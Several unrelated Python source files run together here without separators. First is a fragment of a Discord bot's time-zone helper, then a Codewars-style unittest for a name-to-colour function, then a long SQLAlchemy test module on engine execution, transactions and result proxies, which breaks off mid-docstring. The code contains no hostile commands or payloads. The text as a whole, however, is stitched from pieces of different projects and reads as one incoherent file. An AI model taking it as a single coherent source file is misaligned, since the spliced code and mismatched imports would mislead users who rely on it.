			msg = '{}; where *{}* is, it\'s currently *{}*'.format(t["zone"], DisplayName.name(member), t["time"])
		else:
			msg = '{} is currently *{}*'.format(t["zone"], t["time"])

		# Say message
		await ctx.channel.send(msg)


	def getTimeFromOffset(self, offset):
		# Returns {"zone": label, "time": "HH:MM AM/PM"} for a +-H[:M]
		# offset string, or None if it can't be parsed.
		offset = offset.replace('+', '')
		# Split time string by : and get hour/minute values
		try:
			hours, minutes = map(int, offset.split(':'))
		except Exception:
			try:
				hours = int(offset)
				minutes = 0
			except Exception:
				return None
				# await ctx.channel.send('Offset has to be in +-H:M!')
				# return
		msg = 'UTC'
		# Get the time
		t = datetime.datetime.utcnow()
		# Apply offset
		if hours > 0:
			# Apply positive offset
			msg += '+{}'.format(offset)
			td = datetime.timedelta(hours=hours, minutes=minutes)
			newTime = t + td
		elif hours < 0:
			# Apply negative offset
			msg += '{}'.format(offset)
			td = datetime.timedelta(hours=(-1*hours), minutes=(-1*minutes))
			newTime = t - td
		else:
			# No offset
			newTime = t
		return { "zone" : msg, "time" : newTime.strftime("%I:%M %p") }


	def getTimeFromTZ(self, tz):
		# Assume sanitized zones - as they're pulled from pytz
		# Returns {"zone": name, "time": ...} or None when there is no
		# exact (Ratio == 1) match for the zone name.
		# Let's get the timezone list
		tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
		if not tz_list[0]['Ratio'] == 1:
			# We didn't find a complete match
			return None
		zone = pytz.timezone(tz_list[0]['Item'])
		zone_now = datetime.datetime.now(zone)
		return { "zone" : tz_list[0]['Item'], "time" : zone_now.strftime("%I:%M %p") }
import unittest

from katas.beta.what_color_is_your_name import string_color


class StringColorTestCase(unittest.TestCase):
    """Checks string_color: names map to fixed hex colors; a too-short
    input yields None."""

    def test_equal_1(self):
        self.assertEqual(string_color('Jack'), '79CAE5')

    def test_equal_2(self):
        self.assertEqual(string_color('Joshua'), '6A10D6')

    def test_equal_3(self):
        self.assertEqual(string_color('Joshua Smith'), '8F00FB')

    def test_equal_4(self):
        self.assertEqual(string_color('Hayden Smith'), '7E00EE')

    def test_equal_5(self):
        self.assertEqual(string_color('Mathew Smith'), '8B00F1')

    def test_is_none_1(self):
        self.assertIsNone(string_color('a'))

# coding: utf-8

from sqlalchemy.testing import eq_, assert_raises, assert_raises_message, \
    config, is_
import re
from sqlalchemy.testing.util import picklers
from sqlalchemy.interfaces import ConnectionProxy
from sqlalchemy import MetaData, Integer, String, INT, VARCHAR, func, \
    bindparam, select, event, TypeDecorator, create_engine, Sequence
from sqlalchemy.sql import column, literal
from sqlalchemy.testing.schema import Table, Column
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing import engines
from sqlalchemy import util
from sqlalchemy.testing.engines import testing_engine
import logging.handlers
from sqlalchemy.dialects.oracle.zxjdbc import ReturningParam
from sqlalchemy.engine import result as _result, default
from sqlalchemy.engine.base import Engine
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.mock import Mock, call, patch
from contextlib import contextmanager

# Shared fixture globals; rebound in ExecuteTest.setup_class and
# CompiledCacheTest.setup_class so module-level teardown hooks can reach them.
users, metadata, users_autoinc = None, None, None
class ExecuteTest(fixtures.TestBase):
    """Exercise raw/textual statement execution on Engine and Connection:
    the four DBAPI paramstyles, DBAPI/non-DBAPI exception wrapping and
    pickling, execution options, per-engine event dispatch, and engine
    disposal."""

    __backend__ = True

    @classmethod
    def setup_class(cls):
        # Bind the module-level globals used by the teardown hooks below.
        global users, users_autoinc, metadata
        metadata = MetaData(testing.db)
        users = Table('users', metadata,
            Column('user_id', INT, primary_key=True, autoincrement=False),
            Column('user_name', VARCHAR(20)),
        )
        users_autoinc = Table('users_autoinc', metadata,
            Column('user_id', INT, primary_key=True,
                                    test_needs_autoincrement=True),
            Column('user_name', VARCHAR(20)),
        )
        metadata.create_all()

    @engines.close_first
    def teardown(self):
        # Delete rows after each test; tables are dropped in teardown_class.
        testing.db.execute(users.delete())

    @classmethod
    def teardown_class(cls):
        metadata.drop_all()

    @testing.fails_on("postgresql+pg8000",
            "pg8000 still doesn't allow single % without params")
    def test_no_params_option(self):
        """A literal '%' survives execution when no_parameters is set."""
        stmt = "SELECT '%'" + testing.db.dialect.statement_compiler(
                                    testing.db.dialect, None).default_from()

        conn = testing.db.connect()
        result = conn.\
                execution_options(no_parameters=True).\
                scalar(stmt)
        eq_(result, '%')

    @testing.fails_on_everything_except('firebird',
                                        'sqlite', '+pyodbc',
                                        '+mxodbc', '+zxjdbc', 'mysql+oursql')
    def test_raw_qmark(self):
        """Raw SQL with qmark (?) parameters: tuple, list, multiple
        param-set and bare-positional forms, on both engine and connection."""
        def go(conn):
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', (1, 'jack'))
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', [2, 'fred'])
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', [3, 'ed'], [4, 'horse'])
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', (5, 'barney'), (6, 'donkey'))
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', 7, 'sally')
            res = conn.execute('select * from users order by user_id')
            assert res.fetchall() == [
                (1, 'jack'),
                (2, 'fred'),
                (3, 'ed'),
                (4, 'horse'),
                (5, 'barney'),
                (6, 'donkey'),
                (7, 'sally'),
                ]
            for multiparam, param in [
                (("jack", "fred"), {}),
                ((["jack", "fred"],), {})
            ]:
                res = conn.execute(
                    "select * from users where user_name=? or "
                    "user_name=? order by user_id",
                    *multiparam, **param)
                assert res.fetchall() == [
                    (1, 'jack'),
                    (2, 'fred')
                ]
            res = conn.execute("select * from users where user_name=?",
                "jack"
            )
            assert res.fetchall() == [(1, 'jack')]
            conn.execute('delete from users')

        go(testing.db)
        conn = testing.db.connect()
        try:
            go(conn)
        finally:
            conn.close()

    # some psycopg2 versions bomb this.
    @testing.fails_on_everything_except('mysql+mysqldb', 'mysql+pymysql',
            'mysql+cymysql', 'mysql+mysqlconnector', 'postgresql')
    @testing.fails_on('postgresql+zxjdbc', 'sprintf not supported')
    def test_raw_sprintf(self):
        """Raw SQL with format (%s) parameters, including an insert that
        names only a subset of columns."""
        def go(conn):
            conn.execute('insert into users (user_id, user_name) '
                         'values (%s, %s)', [1, 'jack'])
            conn.execute('insert into users (user_id, user_name) '
                         'values (%s, %s)', [2, 'ed'], [3, 'horse'])
            conn.execute('insert into users (user_id, user_name) '
                         'values (%s, %s)', 4, 'sally')
            conn.execute('insert into users (user_id) values (%s)', 5)
            res = conn.execute('select * from users order by user_id')
            assert res.fetchall() == [(1, 'jack'), (2, 'ed'), (3,
                    'horse'), (4, 'sally'), (5, None)]
            for multiparam, param in [
                (("jack", "ed"), {}),
                ((["jack", "ed"],), {})
            ]:
                res = conn.execute(
                    "select * from users where user_name=%s or "
                    "user_name=%s order by user_id",
                    *multiparam, **param)
                assert res.fetchall() == [
                    (1, 'jack'),
                    (2, 'ed')
                ]
            res = conn.execute("select * from users where user_name=%s",
                "jack"
            )
            assert res.fetchall() == [(1, 'jack')]

            conn.execute('delete from users')
        go(testing.db)
        conn = testing.db.connect()
        try:
            go(conn)
        finally:
            conn.close()

    # pyformat is supported for mysql, but skipping because a few driver
    # versions have a bug that bombs out on this test. (1.2.2b3,
    # 1.2.2c1, 1.2.2)

    @testing.skip_if(lambda : testing.against('mysql+mysqldb'),
                     'db-api flaky')
    @testing.fails_on_everything_except('postgresql+psycopg2',
            'postgresql+pypostgresql', 'mysql+mysqlconnector',
            'mysql+pymysql', 'mysql+cymysql')
    def test_raw_python(self):
        """Raw SQL with pyformat (%(name)s) parameters: dict, multiple
        dicts and keyword-argument forms."""
        def go(conn):
            conn.execute('insert into users (user_id, user_name) '
                         'values (%(id)s, %(name)s)', {'id': 1, 'name'
                         : 'jack'})
            conn.execute('insert into users (user_id, user_name) '
                         'values (%(id)s, %(name)s)', {'id': 2, 'name'
                         : 'ed'}, {'id': 3, 'name': 'horse'})
            conn.execute('insert into users (user_id, user_name) '
                         'values (%(id)s, %(name)s)', id=4, name='sally'
                         )
            res = conn.execute('select * from users order by user_id')
            assert res.fetchall() == [(1, 'jack'), (2, 'ed'), (3,
                    'horse'), (4, 'sally')]
            conn.execute('delete from users')
        go(testing.db)
        conn = testing.db.connect()
        try:
            go(conn)
        finally:
            conn.close()

    @testing.fails_on_everything_except('sqlite', 'oracle+cx_oracle')
    def test_raw_named(self):
        """Raw SQL with named (:name) parameters: dict, multiple dicts
        and keyword-argument forms."""
        def go(conn):
            conn.execute('insert into users (user_id, user_name) '
                         'values (:id, :name)', {'id': 1, 'name': 'jack'
                         })
            conn.execute('insert into users (user_id, user_name) '
                         'values (:id, :name)', {'id': 2, 'name': 'ed'
                         }, {'id': 3, 'name': 'horse'})
            conn.execute('insert into users (user_id, user_name) '
                         'values (:id, :name)', id=4, name='sally')
            res = conn.execute('select * from users order by user_id')
            assert res.fetchall() == [(1, 'jack'), (2, 'ed'), (3,
                    'horse'), (4, 'sally')]
            conn.execute('delete from users')
        go(testing.db)
        conn= testing.db.connect()
        try:
            go(conn)
        finally:
            conn.close()

    @testing.engines.close_open_connections
    def test_exception_wrapping_dbapi(self):
        """Errors raised by the DBAPI for invalid SQL are wrapped in
        DBAPIError, for both engine- and connection-level execute."""
        conn = testing.db.connect()
        for _c in testing.db, conn:
            assert_raises_message(
                tsa.exc.DBAPIError,
                r"not_a_valid_statement",
                _c.execute, 'not_a_valid_statement'
            )

    @testing.requires.sqlite
    def test_exception_wrapping_non_dbapi_error(self):
        """A non-DBAPI exception from the cursor propagates unwrapped and
        does not trigger the dialect's disconnect check."""
        e = create_engine('sqlite://')
        e.dialect.is_disconnect = is_disconnect = Mock()

        with e.connect() as c:
            # Force the cursor's execute() to raise a plain TypeError.
            c.connection.cursor = Mock(
                    return_value=Mock(
                        execute=Mock(
                                side_effect=TypeError("I'm not a DBAPI error")
                        ))
                    )

            assert_raises_message(
                TypeError,
                "I'm not a DBAPI error",
                c.execute, "select "
            )
            eq_(is_disconnect.call_count, 0)


    def test_exception_wrapping_non_dbapi_statement(self):
        """An exception raised during bind-parameter processing is wrapped
        in StatementError with the statement text attached."""
        class MyType(TypeDecorator):
            impl = Integer
            def process_bind_param(self, value, dialect):
                raise Exception("nope")

        def _go(conn):
            assert_raises_message(
                tsa.exc.StatementError,
                r"nope \(original cause: Exception: nope\) u?'SELECT 1 ",
                conn.execute,
                    select([1]).\
                        where(
                            column('foo') == literal('bar', MyType())
                        )
            )
        _go(testing.db)
        conn = testing.db.connect()
        try:
            _go(conn)
        finally:
            conn.close()

    def test_stmt_exception_non_ascii(self):
        """StatementError renders a non-ASCII statement: repr-escaped on
        py2k, literal on py3k."""
        name = util.u('méil')
        with testing.db.connect() as conn:
            assert_raises_message(
                tsa.exc.StatementError,
                util.u(
                    "A value is required for bind parameter 'uname'"
                    r'.*SELECT users.user_name AS .m\\xe9il.') if util.py2k
                else
                    util.u(
                        "A value is required for bind parameter 'uname'"
                        '.*SELECT users.user_name AS .méil.')
                    ,
                conn.execute,
                select([users.c.user_name.label(name)]).where(
                                users.c.user_name == bindparam("uname")),
                {'uname_incorrect': 'foo'}
            )

    def test_stmt_exception_pickleable_no_dbapi(self):
        """Pickle round-trip with a plain Exception as the original."""
        self._test_stmt_exception_pickleable(Exception("hello world"))

    @testing.crashes("postgresql+psycopg2",
                "Older versions don't support cursor pickling, newer ones do")
    @testing.fails_on("mysql+oursql",
                "Exception doesn't come back exactly the same from pickle")
    @testing.fails_on("mysql+mysqlconnector",
                "Exception doesn't come back exactly the same from pickle")
    @testing.fails_on("oracle+cx_oracle",
                        "cx_oracle exception seems to be having "
                        "some issue with pickling")
    def test_stmt_exception_pickleable_plus_dbapi(self):
        """Capture a real DBAPI exception, then check it pickles inside
        SQLAlchemy's exception wrappers."""
        raw = testing.db.raw_connection()
        the_orig = None
        try:
            try:
                cursor = raw.cursor()
                cursor.execute("SELECTINCORRECT")
            except testing.db.dialect.dbapi.DatabaseError as orig:
                # py3k has "orig" in local scope...
                the_orig = orig
        finally:
            raw.close()
        self._test_stmt_exception_pickleable(the_orig)

    def _test_stmt_exception_pickleable(self, orig):
        """Round-trip several SQLAlchemy exception types through every
        available pickler and compare the salient attributes."""
        for sa_exc in (
            tsa.exc.StatementError("some error",
                            "select * from table",
                           {"foo":"bar"},
                            orig),
            tsa.exc.InterfaceError("select * from table",
                            {"foo":"bar"},
                            orig),
            tsa.exc.NoReferencedTableError("message", "tname"),
            tsa.exc.NoReferencedColumnError("message", "tname", "cname"),
            tsa.exc.CircularDependencyError("some message", [1, 2, 3], [(1, 2), (3, 4)]),
        ):
            for loads, dumps in picklers():
                repickled = loads(dumps(sa_exc))
                eq_(repickled.args[0], sa_exc.args[0])
                if isinstance(sa_exc, tsa.exc.StatementError):
                    eq_(repickled.params, {"foo":"bar"})
                    eq_(repickled.statement, sa_exc.statement)
                    if hasattr(sa_exc, "connection_invalidated"):
                        eq_(repickled.connection_invalidated,
                            sa_exc.connection_invalidated)
                    eq_(repickled.orig.args[0], orig.args[0])

    def test_dont_wrap_mixin(self):
        """Exceptions deriving from DontWrapMixin pass through without
        StatementError wrapping."""
        class MyException(Exception, tsa.exc.DontWrapMixin):
            pass

        class MyType(TypeDecorator):
            impl = Integer
            def process_bind_param(self, value, dialect):
                raise MyException("nope")

        def _go(conn):
            assert_raises_message(
                MyException,
                "nope",
                conn.execute,
                    select([1]).\
                        where(
                            column('foo') == literal('bar', MyType())
                        )
            )
        _go(testing.db)
        conn = testing.db.connect()
        try:
            _go(conn)
        finally:
            conn.close()

    def test_empty_insert(self):
        """test that execute() interprets [] as a list with no params"""

        testing.db.execute(users_autoinc.insert().
                    values(user_name=bindparam('name', None)), [])
        eq_(testing.db.execute(users_autoinc.select()).fetchall(), [(1, None)])

    @testing.requires.ad_hoc_engines
    def test_engine_level_options(self):
        """Engine-level execution_options reach connections and merge
        with per-connection options; update_execution_options applies to
        subsequently acquired connections."""
        eng = engines.testing_engine(options={'execution_options':
                                            {'foo': 'bar'}})
        with eng.contextual_connect() as conn:
            eq_(conn._execution_options['foo'], 'bar')
            eq_(conn.execution_options(bat='hoho')._execution_options['foo'
                ], 'bar')
            eq_(conn.execution_options(bat='hoho')._execution_options['bat'
                ], 'hoho')
            eq_(conn.execution_options(foo='hoho')._execution_options['foo'
                ], 'hoho')
            eng.update_execution_options(foo='hoho')
            conn = eng.contextual_connect()
            eq_(conn._execution_options['foo'], 'hoho')

    @testing.requires.ad_hoc_engines
    def test_generative_engine_execution_options(self):
        """Engine.execution_options() derives engines whose option dicts
        layer over the base engine's, while the pool is shared."""
        eng = engines.testing_engine(options={'execution_options':
                                            {'base': 'x1'}})

        eng1 = eng.execution_options(foo="b1")
        eng2 = eng.execution_options(foo="b2")
        eng1a = eng1.execution_options(bar="a1")
        eng2a = eng2.execution_options(foo="b3", bar="a2")

        eq_(eng._execution_options,
                {'base': 'x1'})
        eq_(eng1._execution_options,
                {'base': 'x1', 'foo': 'b1'})
        eq_(eng2._execution_options,
                {'base': 'x1', 'foo': 'b2'})
        eq_(eng1a._execution_options,
                {'base': 'x1', 'foo': 'b1', 'bar': 'a1'})
        eq_(eng2a._execution_options,
                {'base': 'x1', 'foo': 'b3', 'bar': 'a2'})
        is_(eng1a.pool, eng.pool)

        # test pool is shared
        eng2.dispose()
        is_(eng1a.pool, eng2.pool)
        is_(eng.pool, eng2.pool)

    @testing.requires.ad_hoc_engines
    def test_generative_engine_event_dispatch(self):
        """before_execute listeners registered on a base engine and on an
        engine derived via execution_options() dispatch as recorded in
        ``canary``."""
        canary = []
        def l1(*arg, **kw):
            canary.append("l1")
        def l2(*arg, **kw):
            canary.append("l2")
        def l3(*arg, **kw):
            canary.append("l3")

        eng = engines.testing_engine(options={'execution_options':
                                            {'base': 'x1'}})
        event.listen(eng, "before_execute", l1)

        eng1 = eng.execution_options(foo="b1")
        event.listen(eng, "before_execute", l2)
        event.listen(eng1, "before_execute", l3)

        eng.execute(select([1])).close()
        eng1.execute(select([1])).close()

        eq_(canary, ["l1", "l2", "l3", "l1", "l2"])

    @testing.requires.ad_hoc_engines
    def test_generative_engine_event_dispatch_hasevents(self):
        """An engine derived via execution_options() reports _has_events
        when its parent has a listener."""
        def l1(*arg, **kw):
            pass
        eng = create_engine(testing.db.url)
        assert not eng._has_events
        event.listen(eng, "before_execute", l1)
        eng2 = eng.execution_options(foo='bar')
        assert eng2._has_events

    def test_unicode_test_fails_warning(self):
        """A DBAPI failure during the connect-time 'test unicode returns'
        probe surfaces as a SAWarning, and the dialect still ends up with
        a boolean returns_unicode_strings setting."""
        class MockCursor(engines.DBAPIProxyCursor):
            def execute(self, stmt, params=None, **kw):
                if "test unicode returns" in stmt:
                    raise self.engine.dialect.dbapi.DatabaseError("boom")
                else:
                    return super(MockCursor, self).execute(stmt, params, **kw)
        eng = engines.proxying_engine(cursor_cls=MockCursor)
        assert_raises_message(
            tsa.exc.SAWarning,
            "Exception attempting to detect unicode returns",
            eng.connect
        )
        assert eng.dialect.returns_unicode_strings in (True, False)
        eng.dispose()

    def test_works_after_dispose(self):
        """An engine remains usable after dispose(), repeatedly."""
        eng = create_engine(testing.db.url)
        for i in range(3):
            eq_(eng.scalar(select([1])), 1)
            eng.dispose()

    def test_works_after_dispose_testing_engine(self):
        """A testing engine remains usable after dispose(), repeatedly."""
        eng = engines.testing_engine()
        for i in range(3):
            eq_(eng.scalar(select([1])), 1)
            eng.dispose()

class ConvenienceExecuteTest(fixtures.TablesTest):
    """Tests for the convenience transaction APIs: Engine.begin() and
    Connection.begin() used as context managers, Engine.transaction() /
    Connection.transaction() callables, and connections used directly as
    context managers."""

    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        # test_needs_acid requests a transactional backend so the
        # rollback assertions below are meaningful.
        cls.table = Table('exec_test', metadata,
            Column('a', Integer),
            Column('b', Integer),
            test_needs_acid=True
        )

    def _trans_fn(self, is_transaction=False):
        """Return a callable that inserts one row.

        When is_transaction is True the callable receives a Transaction
        and reaches the Connection via its .connection attribute.
        """
        def go(conn, x, value=None):
            if is_transaction:
                conn = conn.connection
            conn.execute(self.table.insert().values(a=x, b=value))
        return go

    def _trans_rollback_fn(self, is_transaction=False):
        """Like _trans_fn, but raises after inserting so the enclosing
        transaction is expected to roll the insert back."""
        def go(conn, x, value=None):
            if is_transaction:
                conn = conn.connection
            conn.execute(self.table.insert().values(a=x, b=value))
            raise Exception("breakage")
        return go

    def _assert_no_data(self):
        # The table is empty, i.e. the work was rolled back.
        eq_(
            testing.db.scalar(self.table.count()), 0
        )

    def _assert_fn(self, x, value=None):
        # Exactly one row with the given values, i.e. the work committed.
        eq_(
            testing.db.execute(self.table.select()).fetchall(),
            [(x, value)]
        )

    def test_transaction_engine_ctx_commit(self):
        """Engine.begin() as a context manager commits on success."""
        fn = self._trans_fn()
        ctx = testing.db.begin()
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_engine_ctx_begin_fails(self):
        """If begin() itself fails, the connection is still closed."""
        engine = engines.testing_engine()

        mock_connection = Mock(
            return_value=Mock(
                        begin=Mock(side_effect=Exception("boom"))
                    )
        )
        engine._connection_cls = mock_connection
        assert_raises(
            Exception,
            engine.begin
        )

        eq_(
            mock_connection.return_value.close.mock_calls,
            [call()]
        )

    def test_transaction_engine_ctx_rollback(self):
        """Engine.begin() as a context manager rolls back on exception."""
        fn = self._trans_rollback_fn()
        ctx = testing.db.begin()
        assert_raises_message(
            Exception,
            "breakage",
            testing.run_as_contextmanager, ctx, fn, 5, value=8
        )
        self._assert_no_data()

    def test_transaction_tlocal_engine_ctx_commit(self):
        """Same commit behavior with a threadlocal-strategy engine."""
        fn = self._trans_fn()
        engine = engines.testing_engine(options=dict(
                                strategy='threadlocal',
                                pool=testing.db.pool))
        ctx = engine.begin()
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_tlocal_engine_ctx_rollback(self):
        """Same rollback behavior with a threadlocal-strategy engine."""
        fn = self._trans_rollback_fn()
        engine = engines.testing_engine(options=dict(
                                strategy='threadlocal',
                                pool=testing.db.pool))
        ctx = engine.begin()
        assert_raises_message(
            Exception,
            "breakage",
            testing.run_as_contextmanager, ctx, fn, 5, value=8
        )
        self._assert_no_data()

    def test_transaction_connection_ctx_commit(self):
        """Connection.begin() as a context manager commits on success."""
        fn = self._trans_fn(True)
        conn = testing.db.connect()
        ctx = conn.begin()
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_connection_ctx_rollback(self):
        """Connection.begin() as a context manager rolls back on error."""
        fn = self._trans_rollback_fn(True)
        conn = testing.db.connect()
        ctx = conn.begin()
        assert_raises_message(
            Exception,
            "breakage",
            testing.run_as_contextmanager, ctx, fn, 5, value=8
        )
        self._assert_no_data()

    def test_connection_as_ctx(self):
        """A plain Connection as a context manager autocommits work."""
        fn = self._trans_fn()
        ctx = testing.db.connect()
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        # autocommit is on
        self._assert_fn(5, value=8)

    @testing.fails_on('mysql+oursql', "oursql bug ?  getting wrong rowcount")
    def test_connect_as_ctx_noautocommit(self):
        """With autocommit disabled, work in a bare connection context is
        not persisted."""
        fn = self._trans_fn()
        self._assert_no_data()
        ctx = testing.db.connect().execution_options(autocommit=False)
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        # autocommit is off
        self._assert_no_data()

    def test_transaction_engine_fn_commit(self):
        """Engine.transaction(fn) commits when fn returns normally."""
        fn = self._trans_fn()
        testing.db.transaction(fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_engine_fn_rollback(self):
        """Engine.transaction(fn) rolls back when fn raises."""
        fn = self._trans_rollback_fn()
        assert_raises_message(
            Exception,
            "breakage",
            testing.db.transaction, fn, 5, value=8
        )
        self._assert_no_data()

    def test_transaction_connection_fn_commit(self):
        """Connection.transaction(fn) commits when fn returns normally."""
        fn = self._trans_fn()
        conn = testing.db.connect()
        conn.transaction(fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_connection_fn_rollback(self):
        """Connection.transaction(fn) rolls back when fn raises."""
        fn = self._trans_rollback_fn()
        conn = testing.db.connect()
        assert_raises(
            Exception,
            conn.transaction, fn, 5, value=8
        )
        self._assert_no_data()

class CompiledCacheTest(fixtures.TestBase):
    """Verify that a connection-level compiled_cache compiles a repeated
    statement only once."""

    __backend__ = True

    @classmethod
    def setup_class(cls):
        # Rebind module-level fixtures shared with the teardown hooks.
        global users, metadata
        metadata = MetaData(testing.db)
        users = Table(
            'users', metadata,
            Column('user_id', INT, primary_key=True,
                   test_needs_autoincrement=True),
            Column('user_name', VARCHAR(20)),
        )
        metadata.create_all()

    @engines.close_first
    def teardown(self):
        # Clear rows between tests; the schema lives until teardown_class.
        testing.db.execute(users.delete())

    @classmethod
    def teardown_class(cls):
        metadata.drop_all()

    def test_cache(self):
        """Three executions of the same insert() construct must leave
        exactly one entry in the cache dict."""
        cache = {}
        conn = testing.db.connect()
        cached_conn = conn.execution_options(compiled_cache=cache)

        ins = users.insert()
        for name in ('u1', 'u2', 'u3'):
            cached_conn.execute(ins, {'user_name': name})
        assert len(cache) == 1
        eq_(conn.execute("select count(*) from users").scalar(), 3)


class MockStrategyTest(fixtures.TestBase):
    """DDL-generation checks using the 'mock' engine strategy, which
    renders SQL into a buffer instead of executing it."""

    def _engine_fixture(self):
        """Return (mock engine, buffer); all statements sent to the
        engine are compiled and written to the buffer."""
        out = util.StringIO()

        def executor(sql, *multiparams, **params):
            out.write(util.text_type(sql.compile(dialect=engine.dialect)))

        engine = create_engine('postgresql://', strategy='mock',
                               executor=executor)
        return engine, out

    def test_sequence_not_duped(self):
        """A Sequence on a primary-key column is created and dropped
        exactly once, alongside its table."""
        engine, out = self._engine_fixture()
        m = MetaData()
        t = Table(
            'testtable', m,
            Column('pk', Integer, Sequence('testtable_pk_seq'),
                   primary_key=True),
        )

        t.create(engine)
        t.drop(engine)

        ddl = out.getvalue()
        eq_(re.findall(r'CREATE (\w+)', ddl), ["SEQUENCE", "TABLE"])
        eq_(re.findall(r'DROP (\w+)', ddl), ["SEQUENCE", "TABLE"])

class ResultProxyTest(fixtures.TestBase):
    """Tests for RowProxy / ResultProxy behavior: duck-typed row storage,
    rowcount access discipline, the sequence protocol, and accessor
    errors on statements that are not inserts/updates."""

    __backend__ = True

    def test_nontuple_row(self):
        """ensure the C version of BaseRowProxy handles
        duck-type-dependent rows."""

        from sqlalchemy.engine import RowProxy

        class MyList(object):
            def __init__(self, l):
                self.l = l

            def __len__(self):
                return len(self.l)

            def __getitem__(self, i):
                return list.__getitem__(self.l, i)

        proxy = RowProxy(object(), MyList(['value']), [None], {'key'
                         : (None, None, 0), 0: (None, None, 0)})
        eq_(list(proxy), ['value'])
        eq_(proxy[0], 'value')
        eq_(proxy['key'], 'value')

    @testing.provide_metadata
    def test_no_rowcount_on_selects_inserts(self):
        """assert that rowcount is only called on deletes and updates.

        This because cursor.rowcount may can be expensive on some dialects
        such as Firebird, however many dialects require it be called
        before the cursor is closed.

        """

        metadata = self.metadata

        engine = engines.testing_engine()

        t = Table('t1', metadata,
            Column('data', String(10))
        )
        metadata.create_all(engine)

        # Replace the rowcount descriptor so every access is recorded
        # via the mocked __get__.
        with patch.object(engine.dialect.execution_ctx_cls, "rowcount") as mock_rowcount:
            mock_rowcount.__get__ = Mock()
            engine.execute(t.insert(),
                                {'data': 'd1'},
                                {'data': 'd2'},
                                {'data': 'd3'})

            eq_(len(mock_rowcount.__get__.mock_calls), 0)

            eq_(
                    engine.execute(t.select()).fetchall(),
                    [('d1', ), ('d2', ), ('d3', )]
            )
            eq_(len(mock_rowcount.__get__.mock_calls), 0)

            engine.execute(t.update(), {'data': 'd4'})

            eq_(len(mock_rowcount.__get__.mock_calls), 1)

            engine.execute(t.delete())
            eq_(len(mock_rowcount.__get__.mock_calls), 2)


    def test_rowproxy_is_sequence(self):
        """RowProxy instances register as collections.Sequence."""
        import collections
        from sqlalchemy.engine import RowProxy

        row = RowProxy(object(), ['value'], [None], {'key'
                         : (None, None, 0), 0: (None, None, 0)})
        assert isinstance(row, collections.Sequence)

    @testing.requires.cextensions
    def test_row_c_sequence_check(self):
        """The C RowProxy passes PySequenceCheck, which csv.writer
        relies on when writing a row."""
        import csv
        import collections

        metadata = MetaData()
        metadata.bind = 'sqlite://'
        users = Table('users', metadata,
            Column('id', Integer, primary_key=True),
            Column('name', String(40)),
        )
        users.create()

        users.insert().execute(name='Test')
        row = users.select().execute().fetchone()

        s = util.StringIO()
        writer = csv.writer(s)
        # csv performs PySequenceCheck call
        writer.writerow(row)
        assert s.getvalue().strip() == '1,Test'

    @testing.requires.selectone
    def test_empty_accessors(self):
        """Insert/update-only result accessors raise InvalidRequestError
        with a statement-kind-specific message on plain selects and on
        textual statements."""
        statements = [
            (
                "select 1",
                [
                    lambda r: r.last_inserted_params(),
                    lambda r: r.last_updated_params(),
                    lambda r: r.prefetch_cols(),
                    lambda r: r.postfetch_cols(),
                    lambda r : r.inserted_primary_key
                ],
                "Statement is not a compiled expression construct."
            ),
            (
                select([1]),
                [
                    lambda r: r.last_inserted_params(),
                    lambda r : r.inserted_primary_key
                ],
                r"Statement is not an insert\(\) expression construct."
            ),
            (
                select([1]),
                [
                    lambda r: r.last_updated_params(),
                ],
                r"Statement is not an update\(\) expression construct."
            ),
            (
                select([1]),
                [
                    lambda r: r.prefetch_cols(),
                    lambda r : r.postfetch_cols()
                ],
                r"Statement is not an insert\(\) "
                r"or update\(\) expression construct."
            ),
        ]

        for stmt, meths, msg in statements:
            r = testing.db.execute(stmt)
            try:
                for meth in meths:
                    assert_raises_message(
                        tsa.exc.InvalidRequestError,
                        msg,
                        meth, r
                    )

            finally:
                r.close()

class ExecutionOptionsTest(fixtures.TestBase):
    """Check that execution options are handed to the dialect hooks and
    inherited by connections created from an engine."""

    def test_dialect_conn_options(self):
        """Connection.execution_options() notifies the dialect with the
        derived connection and the supplied options."""
        eng = testing_engine("sqlite://", options=dict(_initialize=False))
        eng.dialect = Mock()
        base_conn = eng.connect()
        derived = base_conn.execution_options(foo="bar")
        eq_(eng.dialect.set_connection_execution_options.mock_calls,
            [call(derived, {"foo": "bar"})])

    def test_dialect_engine_options(self):
        """Engine.execution_options() notifies the dialect with the
        derived engine and the supplied options."""
        eng = testing_engine("sqlite://")
        eng.dialect = Mock()
        derived = eng.execution_options(foo="bar")
        eq_(eng.dialect.set_engine_execution_options.mock_calls,
            [call(derived, {"foo": "bar"})])

    def test_dialect_engine_construction_options(self):
        """execution_options passed to the Engine constructor also reach
        the dialect hook."""
        dialect = Mock()
        eng = Engine(Mock(), dialect, Mock(),
                     execution_options={"foo": "bar"})
        eq_(dialect.set_engine_execution_options.mock_calls,
            [call(eng, {"foo": "bar"})])

    def test_propagate_engine_to_connection(self):
        """Options set on the engine appear on its connections."""
        eng = testing_engine(
            "sqlite://", options=dict(execution_options={"foo": "bar"}))
        eq_(eng.connect()._execution_options, {"foo": "bar"})

    def test_propagate_option_engine_to_connection(self):
        """A derived engine's options merge with the base engine's, and
        each engine's connections see only their own engine's view."""
        base = testing_engine(
            "sqlite://", options=dict(execution_options={"foo": "bar"}))
        derived = base.execution_options(bat="hoho")
        eq_(base.connect()._execution_options, {"foo": "bar"})
        eq_(derived.connect()._execution_options,
            {"foo": "bar", "bat": "hoho"})





class AlternateResultProxyTest(fixtures.TestBase):
    """Run the same fetchone/fetchmany/fetchall patterns against each
    ResultProxy variant (plain, buffered-row, fully-buffered,
    buffered-column) by swapping in an execution context whose
